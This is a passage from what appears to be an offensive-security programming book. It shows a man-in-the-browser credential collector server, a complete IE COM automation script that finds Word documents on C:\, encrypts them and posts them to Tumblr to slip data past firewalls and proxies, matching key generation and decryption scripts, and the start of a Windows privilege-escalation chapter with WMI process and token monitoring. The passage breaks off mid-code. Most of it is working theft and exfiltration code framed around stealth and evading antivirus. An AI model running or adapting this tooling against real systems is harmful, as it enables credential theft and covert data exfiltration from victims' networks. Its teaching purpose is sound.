localhost - - [12/Mar/2014 00:03:50] "POST /www.facebook.com HTTP/1.1" 301 -

You can clearly see the credentials arriving, and the redirect by the server kicking the browser back to the main login screen. Of course, you can also perform a test where you have Internet Explorer running and you're already logged in to Facebook; then try running your mitb.py script and you can see how it forces the logout. Now that we can nab the user's credentials in this manner, let's see how we can spawn IE to help exfiltrate information from a target network.
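Here is an added Python 3 version of the collector (example code, not the book's cred_server.py) that does what you would want before pointing a real target at it: it parses the posted body into fields instead of printing the raw string, only redirects back to a host from the target list rather than to whatever path the client sent, and builds on BaseHTTPRequestHandler so GET requests don't serve the working directory. SAMPLE_BODY is a constructed request in the shape of the Facebook POST shown above; the Google field names Email and Passwd are an assumption based on the login form of that era, and the function names are this example's own.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, unquote, urlparse

# Hosts mitb.py targets; the redirect is only ever sent back to one of these.
TARGET_HOSTS = {"www.facebook.com", "accounts.google.com",
                "www.gmail.com", "mail.google.com"}

# Constructed request body in the shape of the Facebook POST shown above.
SAMPLE_BODY = (b"lsd=AVog7IRe&email=justin%40nostarch.com&pass=pyth0nrocks"
               b"&default_persistent=0&timezone=180")


def parse_credentials(body):
    """Pull the username/password pair out of a URL-encoded form body.
    Field names differ per site (Facebook: email/pass; Google, assumed:
    Email/Passwd), so try the known ones and keep every field for the rest."""
    fields = parse_qs(body.decode("utf-8"), keep_blank_values=True)

    def first(*names):
        for name in names:
            if name in fields:
                return fields[name][0]
        return None

    return {"user": first("email", "Email", "identifier"),
            "password": first("pass", "Passwd", "password"),
            "fields": fields}


def redirect_target(path, allowed_hosts=TARGET_HOSTS):
    """mitb.py appends the URL-encoded login page to the request path. Decode
    it and only bounce the browser to a host we deliberately targeted; the
    book's server redirects to whatever arrives, which is an open redirect."""
    target = unquote(path.lstrip("/"))
    if "://" not in target:                   # bare hostname form
        target = "https://%s/" % target
    parsed = urlparse(target)
    if parsed.scheme not in ("http", "https") or parsed.hostname not in allowed_hosts:
        return None
    return target


class CredRequestHandler(BaseHTTPRequestHandler):
    """Same shape as cred_server.py, on BaseHTTPRequestHandler so a GET does
    not serve the current directory the way SimpleHTTPRequestHandler would."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        creds = parse_credentials(self.rfile.read(length))
        print("[*] %s user=%r password=%r" % (self.path, creds["user"], creds["password"]))
        target = redirect_target(self.path)
        if target is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(302)               # temporary; 301 would claim the redirect is permanent
        self.send_header("Location", target)
        self.end_headers()


def serve(bind=("0.0.0.0", 8080)):
    HTTPServer(bind, CredRequestHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it in place of cred_server.py and the output line becomes the extracted user and password rather than the whole form body; a POST whose path does not decode to one of TARGET_HOSTS is answered with a 404 and no redirect.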

IE COM Automation for Exfiltration

Gaining access to a target network is only a part of the battle. To make use of your access, you want to be able to exfiltrate documents, spreadsheets, or other bits of data off the target system. Depending on the defense mechanisms in place, this last part of your attack can prove to be tricky. There might be local or remote systems (or a combination of both) that work to validate processes opening remote connections, as well as whether those processes should be able to send information or initiate connections outside of the internal network. A fellow Canadian security researcher, Karim Nathoo, pointed out that IE COM automation has the wonderful benefit of using the Iexplore.exe process, which is typically trusted and whitelisted, to exfiltrate information out of a network.

We'll create a Python script that will first hunt for Microsoft Word documents on the local filesystem. When a document is encountered, the script will encrypt it using public key cryptography.[20] After the document is encrypted, we'll automate the process of posting the encrypted document to a blog on tumblr.com. This will enable us to dead-drop the document and retrieve it when we want to without anyone else being able to decrypt it. By using a trusted site like Tumblr, we should also be able to bypass any blacklisting that a firewall or proxy may have, which might otherwise prevent us from just sending the document to an IP address or web server that we control. Let's start by putting some supporting functions into our exfiltration script. Open up ie_exfil.py and enter the following code:
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

doc_type   = ".doc"
username   = "jms@bughunter.ca"
password   = "justinBHP2014"
public_key = ""

def wait_for_browser(browser):
    # wait for the browser to finish loading a page
    while browser.ReadyState != 4 and browser.ReadyState != "complete":
        time.sleep(0.1)
    return
We are only creating our imports, the document type that we will search for, our Tumblr username and password, and a placeholder for our public key, which we'll generate later on. Now let's add our encryption routines so that we can encrypt the filename and file contents.
def encrypt_string(plaintext):
    # PKCS#1 OAEP with SHA-1 accepts at most k - 2*20 - 2 bytes per
    # operation; for a 2048-bit key (k = 256) that is 214 bytes, and each
    # encrypted chunk comes back as a 256-byte block
    chunk_size = 214
    print "Compressing: %d bytes" % len(plaintext)
➊   plaintext = zlib.compress(plaintext)
    print "Encrypting %d bytes" % len(plaintext)
➋   rsakey = RSA.importKey(public_key)
    rsakey = PKCS1_OAEP.new(rsakey)
    encrypted = ""

    offset = 0
➌   while offset < len(plaintext):
        chunk = plaintext[offset:offset+chunk_size]
➍       if len(chunk) % chunk_size != 0:
            chunk += " " * (chunk_size - len(chunk))
        encrypted += rsakey.encrypt(chunk)
        offset += chunk_size
➎   encrypted = encrypted.encode("base64")
    print "Base64 encoded crypto: %d" % len(encrypted)
    return encrypted

def encrypt_post(filename):
    # open and read the file
    fd = open(filename,"rb")
    contents = fd.read()
    fd.close()
➏   encrypted_title = encrypt_string(filename)
    encrypted_body = encrypt_string(contents)
    return encrypted_title,encrypted_body
Our encrypt_post function is responsible for taking in the filename and returning both the encrypted filename and the encrypted file contents in base64-encoded format. We first call the main workhorse function encrypt_string ➏, passing in the filename of our target file, which will become the title of our blog post on Tumblr. The first step of our encrypt_string function is to apply zlib compression to the file ➊ before setting up our RSA public key encryption object ➋ using our generated public key. We then begin looping through the file contents ➌ and encrypting them in 214-byte chunks. PKCS#1 OAEP, which PyCrypto's PKCS1_OAEP implements with SHA-1, can only wrap k - 2*hLen - 2 bytes per operation; for a 2048-bit key that is 256 - 42 = 214 bytes, and each chunk comes back as a 256-byte ciphertext block. Asking it to encrypt 256 bytes at a time fails with "Plaintext is too long." When we encounter the last chunk of the file ➍, if it is not 214 bytes long, we pad it with spaces so that every chunk is the same size (OAEP would accept a shorter final chunk just as well, so the padding is a convenience rather than a requirement). After we build our entire ciphertext string, we base64-encode it before returning it. We use base64 encoding so that we can post it to our Tumblr blog without problems or weird encoding issues.
Now that we have our encryption routines set up, let's begin adding in the logic to deal with logging in and navigating the Tumblr dashboard. Unfortunately, there is no quick and easy way of finding UI elements on the Web: I simply spent 30 minutes using Google Chrome and its developer tools to inspect each HTML element that I needed to interact with.
It is also worth noting that through Tumblr's settings page, I turned the editing mode to plain text, which disables their pesky JavaScript-based editor. If you wish to use a different service, then you too will have to figure out the precise timing, DOM interactions, and HTML elements that are required; luckily, Python makes the automation piece very easy. Let's add some more code!
➊ def random_sleep():
    time.sleep(random.randint(5,10))
    return

def login_to_tumblr(ie):
    # retrieve all elements in the document
➋   full_doc = ie.Document.all
    # iterate looking for the login form
    for i in full_doc:
➌       if i.id == "signup_email":
            i.setAttribute("value",username)
        elif i.id == "signup_password":
            i.setAttribute("value",password)
    random_sleep()
    # you can be presented with different home pages
    try:
➍       if ie.Document.forms[0].id == "signup_form":
            ie.Document.forms[0].submit()
        else:
            # the login form is the second form on the page
            ie.Document.forms[1].submit()
    except IndexError, e:
        pass
    random_sleep()
    wait_for_browser(ie)
    return
We create a simple function called random_sleep ➊ that will sleep for a random period of time; this is designed to allow the browser to execute tasks that might not register events with the DOM to signal that they are complete. It also makes the browser appear to be a bit more human. Our login_to_tumblr function begins by retrieving all elements in the DOM ➋, and looks for the email and password fields ➌ and sets them to the credentials we provide (don't forget to sign up for an account). Tumblr can present a slightly different login screen with each visit, so the next bit of code ➍ simply tries to find the login form and submit it accordingly, inside a try block so that a page with fewer forms than expected is skipped rather than crashing the script. After this code executes, we should now be logged in to the Tumblr dashboard and ready to post some information. Let's add that code now.
def post_to_tumblr(ie,title,post):
    full_doc = ie.Document.all
    title_box = None
    post_form = None
    for i in full_doc:
        if i.id == "post_one":
            i.setAttribute("value",title)
            title_box = i
            i.focus()
        elif i.id == "post_two":
            i.setAttribute("innerHTML",post)
            print "Set text area"
            i.focus()
        elif i.id == "create_post":
            print "Found post button"
            post_form = i
            i.focus()
    if title_box is None or post_form is None:
        raise RuntimeError("could not find the Tumblr post form elements")
    # move focus away from the main content box
    random_sleep()
➊   title_box.focus()
    random_sleep()
    # post the form
    post_form.children[0].click()
    wait_for_browser(ie)
    random_sleep()
    return
None of this code should look very new at this point. We are simply hunting through the DOM to find where to post the title and body of the blog posting. The post_to_tumblr function only receives an instance of the browser and the encrypted filename and file contents to post. One little trick (learned by observing in Chrome developer tools) ➊ is that we have to shift focus away from the main content part of the post so that Tumblr's JavaScript enables the Post button. These subtle little tricks are important to jot down as you apply this technique to other sites. Now that we can log in and post to Tumblr, let's put the finishing touches in place for our script.
def exfiltrate(document_path):
➊   ie = win32com.client.Dispatch("InternetExplorer.Application")
➋   ie.Visible = 1
    # head to tumblr and login
    ie.Navigate("http://www.tumblr.com/login")
    wait_for_browser(ie)
    print "Logging in..."
    login_to_tumblr(ie)
    print "Logged in...navigating"
    ie.Navigate("https://www.tumblr.com/new/text")
    wait_for_browser(ie)
    # encrypt the file
    title,body = encrypt_post(document_path)
    print "Creating new post..."
    post_to_tumblr(ie,title,body)
    print "Posted!"
    # destroy the IE instance
➌   ie.Quit()
    ie = None
    return

# main loop for document discovery
# NOTE: no tab for first line of code below
➍ for parent, directories, filenames in os.walk("C:\\"):
    for filename in fnmatch.filter(filenames,"*%s" % doc_type):
        document_path = os.path.join(parent,filename)
        print "Found: %s" % document_path
        exfiltrate(document_path)
        raw_input("Continue?")
Our exfiltrate function is what we will call for every document that we want to store on Tumblr. It first creates a new instance of the Internet Explorer COM object ➊, and the neat thing is that you can set the process to be visible or not ➋. For debugging, leave it set to 1, but for maximum stealth you definitely want to set it to 0. This is really useful if, for example, your trojan detects other activity going on; in that case, you can start exfiltrating documents, which might help to further blend your activities in with that of the user. After we call all of our helper functions, we simply kill our IE instance ➌ and return. The last bit of our script ➍ is responsible for crawling through the C:\ drive on the target system and attempting to match our preset file extension (.doc in this case). Each time a file is found, we simply pass the full path of the file off to our exfiltrate function.
Now that we have our main code ready to go, we need to create a quick and dirty RSA key generation script, as well as a decryption script that we can use to paste in a chunk of encrypted Tumblr text and retrieve the plaintext. Let's start by opening keygen.py and entering the following code:
from Crypto.PublicKey import RSA

new_key = RSA.generate(2048, e=65537)
public_key = new_key.publickey().exportKey("PEM")
private_key = new_key.exportKey("PEM")
print public_key
print private_key
That's right: Python is so bad-ass that we can do it in a handful of lines of code. This block of code outputs both a private and public key pair. Copy the public key into your ie_exfil.py script. Then open a new Python file called decryptor.py and enter the following code (paste the private key into the private_key variable, and the blob you want to decrypt into the encrypted variable):
import zlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

private_key = "###PASTE PRIVATE KEY HERE###"
encrypted   = "###PASTE ENCRYPTED BLOB HERE###"

➊ rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey)
# each RSA-OAEP ciphertext block is the size of the modulus:
# 256 bytes for a 2048-bit key
chunk_size = 256
offset = 0
decrypted = ""
➋ encrypted = base64.b64decode(encrypted)
while offset < len(encrypted):
➌   decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size])
    offset += chunk_size
# now we decompress to original
➍ plaintext = zlib.decompress(decrypted)
print plaintext
Perfect! We simply instantiate our RSA class with the private key ➊ and then shortly thereafter we base64-decode ➋ our encoded blob from Tumblr. Much like our encoding loop, we simply grab 256-byte chunks ➌ and decrypt them, slowly building up our original plaintext string. The chunk size differs from the encryptor's 214 bytes on purpose: 256 bytes is the size of one RSA-OAEP ciphertext block for a 2048-bit key, and each block decrypts back to the plaintext chunk that went in. The final step ➍ is to decompress the payload, because we previously compressed it on the other side.

Kicking the Tires
There are a lot of moving parts to this piece of code, but it is quite easy to use. Simply run your ie_exfil.py script from a Windows host and wait for it to indicate that it has successfully posted to Tumblr. If you left Internet Explorer visible, you should have been able to watch the whole process. After it's complete, you should be able to browse to your Tumblr page and see something like Figure 9-1.
Figure 9-1. Our encrypted filename
As you can see, there is a big encrypted blob, which is the name of our file. If you scroll down, you will clearly see that the title ends where the font is no longer bold. If you copy and paste the title into your decryptor.py file and run it, you should see something like this:
#:> python decryptor.py
C:\Program Files\Debugging Tools for Windows (x86)\dml.doc
#:>
Perfect! My ie_exfil.py script picked up a document from the Windows Debugging Tools directory, uploaded the contents to Tumblr, and I can successfully decrypt the filename. Now of course, to do the entire contents of the file, you would want to automate it using the tricks I showed you in Chapter 5 (using urllib2 and HTMLParser), which I will leave as a homework assignment for you. The other thing to consider is that in our ie_exfil.py script, we pad the last chunk with the space character, and this could break certain file formats. In practice the zlib layer hides it: the padding lands after the end of the compressed stream, and zlib.decompress stops at the end of that stream and ignores the trailing bytes, which is why the filename above came back clean. The padding is unnecessary in any case, because RSA-OAEP recovers each chunk at its exact length, so the simplest fix is to drop it. If you move to a scheme that does need fixed-size blocks, another idea for extending the project is to encrypt a length field at the beginning of the blog post contents that tells you the original size of the document before you padded it. You can then read in this length after decrypting the blog post contents and trim the file to that exact size.
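The chunking rules above are worth seeing end to end. The following is an added example in Python 3, not code from the book: it derives the chunk size from the key instead of hard-coding it, drops the space padding (RSA-OAEP returns each chunk at its exact length, so nothing needs trimming), and checks that the decoded blob is a whole number of blocks before decrypting. Because the real cipher needs PyCrypto and a key pair, the block uses a clearly labelled stand-in object that reproduces only PKCS1_OAEP's size behaviour (the 214-byte input limit for a 2048-bit key and 256-byte output blocks) and performs no cryptography at all; seal() and unseal() take the encrypt/decrypt callables as parameters, so with PyCrypto installed you pass PKCS1_OAEP.new(RSA.importKey(public_key)).encrypt, and the matching decrypt built from keygen.py's private key, in its place. The document bytes and filename in the usage section are constructed test data.

```python
import base64
import struct
import zlib


def oaep_max_plaintext(modulus_bits, hash_len=20):
    """Largest message RSAES-OAEP will wrap for a modulus of modulus_bits
    bits and a hash_len-byte hash: k - 2*hLen - 2.  PyCrypto's PKCS1_OAEP
    uses SHA-1 by default, so hash_len is 20 and a 2048-bit key gives 214."""
    return modulus_bits // 8 - 2 * hash_len - 2


class OAEPSizeStandIn:
    """NOT encryption.  A transparent stand-in that reproduces only the size
    rules of a PKCS1_OAEP cipher object so the framing code below runs
    offline: encrypt() refuses anything over the OAEP limit (PyCrypto's
    message is "Plaintext is too long.") and always emits exactly k bytes;
    decrypt() demands exactly k bytes and returns the message at its
    original length.  In the real scripts replace it with
    PKCS1_OAEP.new(RSA.importKey(pem)) and leave seal()/unseal() alone."""

    def __init__(self, modulus_bits=2048):
        self.k = modulus_bits // 8
        self.max_plaintext = oaep_max_plaintext(modulus_bits)

    def encrypt(self, message):
        if len(message) > self.max_plaintext:
            raise ValueError("Plaintext is too long.")
        framed = struct.pack(">H", len(message)) + message   # length prefix, zero fill
        return framed + b"\x00" * (self.k - len(framed))

    def decrypt(self, block):
        if len(block) != self.k:
            raise ValueError("Ciphertext with incorrect length.")
        (length,) = struct.unpack(">H", block[:2])
        return block[2:2 + length]


def seal(data, encrypt, modulus_bits=2048):
    """ie_exfil.py's encrypt_string with the chunk size derived from the key:
    compress, cut the compressed stream into pieces of at most the OAEP
    limit, encrypt each piece (a short last piece is fine, OAEP pads
    internally, so no space padding), concatenate the k-byte blocks and
    base64 the result for the blog post."""
    chunk = oaep_max_plaintext(modulus_bits)
    compressed = zlib.compress(data)
    blocks = [encrypt(compressed[i:i + chunk]) for i in range(0, len(compressed), chunk)]
    return base64.b64encode(b"".join(blocks)).decode("ascii")


def unseal(blob, decrypt, modulus_bits=2048):
    """decryptor.py's loop with a sanity check on the blob: after base64
    decoding it must be a whole number of k-byte blocks.  Each block
    decrypts to exactly the bytes that went in, so the compressed stream is
    reassembled without any length field or trimming."""
    k = modulus_bits // 8
    raw = base64.b64decode(blob)
    if not raw or len(raw) % k:
        raise ValueError("blob is %d bytes, not a multiple of %d" % (len(raw), k))
    compressed = b"".join(decrypt(raw[i:i + k]) for i in range(0, len(raw), k))
    return zlib.decompress(compressed)


def book_chunking_fails(encrypt, chunk_size=256):
    """True if the cipher rejects a chunk of chunk_size bytes, which a real
    2048-bit OAEP object does for the book's 256-byte chunks (256 > 214)."""
    try:
        encrypt(b"\x00" * chunk_size)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    cipher = OAEPSizeStandIn(2048)
    # constructed input: binary content with trailing spaces and NULs
    document = bytes(range(256)) * 4 + b"   \x00\x00"
    blob = seal(document, cipher.encrypt)
    print("OAEP limit for a 2048-bit key:", oaep_max_plaintext(2048))
    print("book's 256-byte chunk rejected:", book_chunking_fails(cipher.encrypt))
    print("round trip intact:", unseal(blob, cipher.decrypt) == document)
```

With the stand-in swapped for PyCrypto's object the only change is the import: the blob format, the 214/256 split and the decoder's block check are exactly what ie_exfil.py and decryptor.py need.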
[20] The Python package PyCrypto can be installed from http://www.voidspace.org.uk/python/modules.shtml#pycrypto/.

Chapter 10. Windows Privilege Escalation
So you've popped a box inside a nice juicy Windows network. Maybe you leveraged a remote heap overflow, or you phished your way into the network. It's time to start looking for ways to escalate privileges. If you're already SYSTEM or Administrator, you probably want several ways of achieving those privileges in case a patch cycle kills your access. It can also be important to have a catalog of privilege escalations in your back pocket, as some enterprises run software that may be difficult to analyze in your own environment, and you may not run into that software until you're in an enterprise of the same size or composition. In a typical privilege escalation, you're going to exploit a poorly coded driver or native Windows kernel issue, but if you use a low-quality exploit or there's a problem during exploitation, you run the risk of system instability. We're going to explore some other means of acquiring elevated privileges on Windows.
System administrators in large enterprises commonly have scheduled tasks or services that will execute child processes or run VBScript or PowerShell scripts to automate tasks. Vendors, too, often have automated, built-in tasks that behave the same way. We're going to try to take advantage of high-privilege processes handling files or executing binaries that are writable by low-privilege users. There are countless ways for you to try to escalate privileges on Windows, and we are only going to cover a few. However, when you understand these core concepts, you can expand your scripts to begin exploring other dark, musty corners of your Windows targets.
We'll start by learning how to apply Windows WMI programming to create a flexible interface that monitors the creation of new processes. We harvest useful data such as the file paths, the user that created the process, and enabled privileges. Our process monitoring then hands off all file paths to a file-monitoring script that continuously keeps track of any new files created and what is written to them. This tells us which files are being accessed by high-privilege processes and the file's location. The final step is to intercept the file-creation process so that we can inject scripting code and have the high-privilege process execute a command shell. The beauty of this whole process is that it doesn't involve any API hooking, so we can fly under most antivirus software's radar.

Installing the Prerequisites
We need to install a few libraries in order to write the tooling in this chapter. If you followed the initial instructions at the beginning of the book, you'll have easy_install ready to rock. If not, refer to Chapter 1 for instructions on installing easy_install.
Execute the following in a cmd.exe shell on your Windows VM:
C:\> easy_install pywin32 wmi
If for some reason this installation method does not work for you, download the PyWin32 installer directly from http://sourceforge.net/projects/pywin32/.
Next, you'll want to install the example service that my tech reviewers Dan Frisch and Cliff Janzen wrote for me. This service emulates a common set of vulnerabilities that we've uncovered in large enterprise networks and helps to illustrate the example code in this chapter.
1. Download the zip file from: http://www.nostarch.com/blackhatpython/bhpservice.zip.
2. Install the service using the provided batch script, install_service.bat. Make sure you are running as Administrator when doing so.
You should be good to go, so now let's get on with the fun part!

Creating a Process Monitor
I participated in a project for Immunity called El Jefe, which is at its core a very simple process-monitoring system with centralized logging (http://eljefe.immunityinc.com/). The tool is designed to be used by people on the defense side of security to track process creation and the installation of malware. While consulting one day, my coworker Mark Wuergler suggested that we use El Jefe as a lightweight mechanism to monitor processes executed as SYSTEM on our target Windows machines. This would give us insight into potentially insecure file handling or child process creation. It worked, and we walked away with numerous privilege escalation bugs that gave us the keys to the kingdom.
The major drawback of the original El Jefe is that it used a DLL that was injected into every process to intercept calls to all forms of the native CreateProcess function. It then used a named pipe to communicate to the collection client, which then forwarded the details of the process creation to the logging server. The problem with this is that most antivirus software also hooks the CreateProcess calls, so either they view you as malware or you have system instability issues when El Jefe runs side-by-side with antivirus software. We'll re-create some of El Jefe's monitoring capabilities in a hookless manner, which also will be geared toward offensive techniques rather than monitoring. This should make our monitoring portable and give us the ability to run with antivirus software activated without issue.

Process Monitoring with WMI
The WMI API gives the programmer the ability to monitor the system for certain events, and then receive callbacks when those events occur. We're going to leverage this interface to receive a callback every time a process is created. When a process gets created, we're going to trap some valuable information for our purposes: the time the process was created, the user that spawned the process, the executable that was launched and its command-line arguments, the process ID, and the parent process ID. This will show us any processes that are created by higher-privilege accounts, and in particular, any processes that are calling external files such as VBScript or batch scripts. When we have all of this information, we'll also determine what privileges are enabled on the process tokens. In certain rare cases, you'll find processes that are created as a regular user but which have been granted additional Windows privileges that you can leverage.
Let's begin by creating a very simple monitoring script[21] that provides the basic process information, and then build on that to determine the enabled privileges. Note that in order to capture information about high-privilege processes created by SYSTEM, for example, you'll need to run your monitoring script as an Administrator. Let's get started by adding the following code to process_monitor.py:
import win32con
import win32api
import win32security
import wmi
import sys
import os

def log_to_file(message):
    fd = open("process_monitor_log.csv", "ab")
    fd.write("%s\r\n" % message)
    fd.close()
    return

# create a log file header
log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")

# instantiate the WMI interface
➊ c = wmi.WMI()

# create our process monitor
➋ process_watcher = c.Win32_Process.watch_for("creation")

while True:
    try:
➌       new_process = process_watcher()
➍       proc_owner = new_process.GetOwner()
        proc_owner = "%s\\%s" % (proc_owner[0],proc_owner[2])
        create_date = new_process.CreationDate
        executable = new_process.ExecutablePath
        cmdline = new_process.CommandLine
        pid = new_process.ProcessId
        parent_pid = new_process.ParentProcessId
        privileges = "N/A"
        # log_to_file appends the line terminator, so none is needed here
        process_log_message = "%s,%s,%s,%s,%s,%s,%s" % (create_date,
            proc_owner, executable, cmdline, pid, parent_pid, privileges)
        print process_log_message
        log_to_file(process_log_message)
    except KeyboardInterrupt:
        # a bare except would swallow Ctrl-C and make the loop unkillable
        break
    except:
        pass
We start by instantiating the WMI class ➊ and then telling it to watch for the process creation event ➋. By reading the Python WMI documentation, we learn that you can monitor process creation or deletion events. If you decide that you'd like to closely monitor process events, you can watch for "operation" instead, and it will notify you of every single event a process goes through. We then enter a loop, and the loop blocks until process_watcher returns a new process event ➌. The new process event is a WMI class called Win32_Process[22] that contains all of the relevant information that we are after. One of the class functions is GetOwner, which we call ➍ to determine who spawned the process, and from there we collect all of the process information we are looking for, output it to the screen, and log it to a file.

Kicking the Tires
Let's fire up our process monitoring script and then create some processes to see what the output looks like.
C:\> python process_monitor.py
20130907115227.048683-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\notepad.exe,"C:\WINDOWS\system32\notepad.exe" ,740,508,N/A
20130907115237.095300-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\calc.exe,"C:\WINDOWS\system32\calc.exe" ,2920,508,N/A
After running the script, I ran notepad.exe and calc.exe. You can see the information being output correctly, and notice that both processes had the Parent PID set to 508, which is the process ID of explorer.exe in my VM. You could now take an extended break and let this script run for a day and see all of the processes, scheduled tasks, and various software updaters running. You might also spot malware if you're (un)lucky. It's also useful to log out and log back in to your target, as events generated from these actions could indicate privileged processes. Now that we have basic process monitoring in place, let's fill out the privileges field in our logging and learn a little bit about how Windows privileges work and why they're important.

Windows Token Privileges
A Windows token is, per Microsoft: "an object that describes the security context of a process or thread."[23] How a token is initialized and which permissions and privileges are set on a token determine which tasks that process or thread can perform. A well-intentioned developer might have a system tray application as part of a security product, which they'd like to give the ability for a non-privileged user to control the main Windows service, which is a driver. The developer uses the native Windows API function AdjustTokenPrivileges on the process and innocently enough enables the SeLoadDriverPrivilege privilege for the system tray application (AdjustTokenPrivileges can only switch on a privilege the account already holds, so the privilege has been assigned to that user as well). What the developer is not thinking about is the fact that if you can climb inside that system tray application, you too now have the ability to load or unload any driver you want, which means you can drop a kernel mode rootkit, and that means game over.
Bear in mind, if you can't run your process monitor as SYSTEM or an administrative user, then you need to keep an eye on what processes you are able to monitor, and see if there are any additional privileges you can leverage. A process running as your user with the wrong privileges is a fantastic way to get to SYSTEM or run code in the kernel. Interesting privileges that I always look out for are listed in Table 10-1. It isn't exhaustive, but serves as a good starting point.[24]
Table 10-1. Interesting Privileges
Privilege name         Access that is granted
SeBackupPrivilege      Enables the user process to back up files and directories, and grants READ access to files no matter what their ACL defines.
SeDebugPrivilege       Enables the user process to debug other processes. This also includes obtaining process handles to inject DLLs or code into running processes.
SeLoadDriverPrivilege  Enables a user process to load or unload drivers.
Now that we have the fundamentals of what privileges are and which privileges to look for, let's leverage Python to automatically retrieve the enabled privileges on the processes we're monitoring. We'll make use of the win32security, win32api, and win32con modules. If you encounter a situation where you can't load these modules, all of the following functions can be translated into native calls using the ctypes library; it's just a lot more work. Add the following code to process_monitor.py directly above our existing log_to_file function:
def get_process_privileges(pid):
    try:
        # obtain a handle to the target process
➊       hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_INFORMATION,False,pid)
        # open the main process token
➋       htok = win32security.OpenProcessToken(hproc,win32con.TOKEN_QUERY)
        # retrieve the list of privileges enabled
➌       privs = win32security.GetTokenInformation(htok, win32security.TokenPrivileges)
        # iterate over privileges and output the ones that are enabled
        priv_list = ""
        for i in privs:
            # check if the privilege is enabled: the attribute word carries
            # SE_PRIVILEGE_ENABLED (2), optionally together with
            # SE_PRIVILEGE_ENABLED_BY_DEFAULT (1), so test the bit rather
            # than comparing the whole value against 3
➍           if i[1] & win32con.SE_PRIVILEGE_ENABLED:
➎               priv_list += "%s|" % win32security.LookupPrivilegeName(None,i[0])
    except:
        priv_list = "N/A"
    return priv_list
We use the process ID to obtain a handle to the target process ➊. Next, we crack open the process token ➋ and then request the token information for that process ➌. By sending the win32security.TokenPrivileges constant, we are instructing the API call to hand back all of the privilege information for that process. The function call returns a list of tuples, where the first member of the tuple is the privilege's LUID and the second member is the attribute word that describes whether the privilege is enabled: SE_PRIVILEGE_ENABLED (2), possibly combined with SE_PRIVILEGE_ENABLED_BY_DEFAULT (1). Because we are only concerned with the privileges that are enabled, we first test for the enabled bit ➍ (a straight comparison against 3 would miss a privilege that is enabled but was not enabled by default) and then we look up the human-readable name for that privilege ➎.
Next we'll modify our existing code so that we're properly outputting and logging this information. Change the following line of code from this:
privileges = "N/A"
to the following:
privileges = get_process_privileges(pid)
Now that we have added our privilege tracking code, let's rerun the process_monitor.py script and check the output. You should see privilege information as shown in the output below:
C:\> python.exe process_monitor.py
20130907233506.055054-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\notepad.exe,"C:\WINDOWS\system32\notepad.exe" ,660,508,SeChangeNotifyPrivilege|SeImpersonatePrivilege|SeCreateGlobalPrivilege|
20130907233515.914176-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\calc.exe,"C:\WINDOWS\system32\calc.exe" ,1004,508,SeChangeNotifyPrivilege|SeImpersonatePrivilege|SeCreateGlobalPrivilege|
You can see that we are correctly logging the enabled privileges for these processes. We could easily put some intelligence into the script to log only processes that run as an unprivileged user but have interesting privileges enabled. We will see how this use of process monitoring will let us find processes that are utilizing external files insecurely.
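The "intelligence" just mentioned is easy to bolt on once the attribute bitmask is decoded properly. The following is an added example, not code from the book: it decodes (LUID, attributes) tuples in the shape GetTokenInformation returns them, filters out SYSTEM, and flags processes holding privileges that are well-known escalation paths. The INTERESTING_PRIVILEGES set, the LUID_NAMES table (small integers standing in for the opaque per-boot LUIDs), lookup_privilege_name and SAMPLE_RECORDS are all constructed for offline use; on a live host the names come from win32security.LookupPrivilegeName.

```python
# Added example: decode token privilege attributes and flag non-SYSTEM
# processes that hold abusable privileges. Runs offline; the token records
# below are constructed, not captured from a real host.

SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_REMOVED = 0x00000004

# Privileges that commonly allow escalation to SYSTEM or arbitrary code
# execution (token impersonation/assignment, debugging, driver loading,
# backup/restore and ownership bypasses of file ACLs).
INTERESTING_PRIVILEGES = {
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege", "SeLoadDriverPrivilege", "SeBackupPrivilege",
    "SeRestorePrivilege", "SeTakeOwnershipPrivilege", "SeCreateTokenPrivilege",
}

# Assumed LUID -> name table; real LUIDs are opaque and resolved via the API.
LUID_NAMES = {
    17: "SeBackupPrivilege",
    20: "SeDebugPrivilege",
    23: "SeChangeNotifyPrivilege",
    29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege",
}


def lookup_privilege_name(luid):
    """Offline stand-in for win32security.LookupPrivilegeName(None, luid)."""
    return LUID_NAMES.get(luid, "UnknownPrivilege%d" % luid)


def enabled_privileges(privs):
    """Return the names of privileges whose SE_PRIVILEGE_ENABLED bit is set.

    Comparing attributes against the exact value 3 only matches privileges
    that are enabled *and* enabled-by-default; one switched on at runtime via
    AdjustTokenPrivileges carries attributes == 2 and would be missed.
    Privileges flagged REMOVED are skipped regardless of other bits.
    """
    names = []
    for luid, attributes in privs:
        if attributes & SE_PRIVILEGE_REMOVED:
            continue
        if attributes & SE_PRIVILEGE_ENABLED:
            names.append(lookup_privilege_name(luid))
    return names


def interesting_processes(records):
    """Keep records (pid, owner, privs) whose owner is not SYSTEM but which
    hold an enabled privilege from INTERESTING_PRIVILEGES.

    Returns a list of (pid, owner, sorted interesting privilege names).
    """
    hits = []
    for pid, owner, privs in records:
        if owner.upper() == "NT AUTHORITY\\SYSTEM":
            continue  # SYSTEM already has everything; nothing to escalate to
        found = sorted(set(enabled_privileges(privs)) & INTERESTING_PRIVILEGES)
        if found:
            hits.append((pid, owner, found))
    return hits


# Constructed sample token data (assumption: not from a real machine).
SAMPLE_RECORDS = [
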